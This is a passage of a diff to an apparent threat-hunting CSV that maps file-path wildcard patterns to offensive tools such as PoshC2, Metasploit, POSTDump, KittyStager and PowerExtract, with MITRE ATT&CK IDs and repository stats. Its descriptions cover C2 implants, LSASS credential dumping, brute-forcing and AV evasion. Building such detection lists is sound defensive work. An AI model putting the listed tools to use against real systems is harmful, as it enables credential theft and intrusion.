T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/PoshC2/*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-config*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-log*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-project*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - 
T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-stop-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 
- T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/posh-update*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*/post_exploitation*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/PoshC2*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
*nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/poshc2-*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/PoshC2/*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*/posh-config*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-log*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh-project*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - 
TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/posh-server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/posh-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/posh-stop-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/posh-update*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/post_exploitation*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/PostDump.exe*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z"
 "*/POSTDump.git*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z"
-"*/postLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
-"*/postLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
-"*/PowerBruteLogon*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","112","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z"
+"*/postLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*/postLegit/qhwl*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*/PowerBruteLogon*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z"
 "*/PowerExtract.git*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
 "*/PowerExtract.git*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
-"*/powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/powerglot/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
-"*/powerloader.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
-"*/Powermad.git*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
+"*/powerloader.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/Powermad.git*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
 "*/power-pwn.git*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z"
 "*/PowerSCCM.git*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z"
-"*/PowerSharpPack.git*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
-"*/powershell/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*/PowerSharpPack.git*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
+"*/powershell/process_injection/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
 "*/powershell_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z"
-"*/PowershellKerberos.git*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z"
+"*/PowershellKerberos.git*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z"
 "*/PowerShx.git*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z"
-"*/PowerTools*","offensive_tool_keyword","empire","Empire power tools like powerview powerbreach powerpick powerup","T1003 - T1078 - T1059 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Information Gathering","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","1931","826","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z"
+"*/PowerTools*","offensive_tool_keyword","empire","Empire power tools like powerview powerbreach powerpick powerup","T1003 - T1078 - T1059 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Information Gathering","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","1932","825","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z"
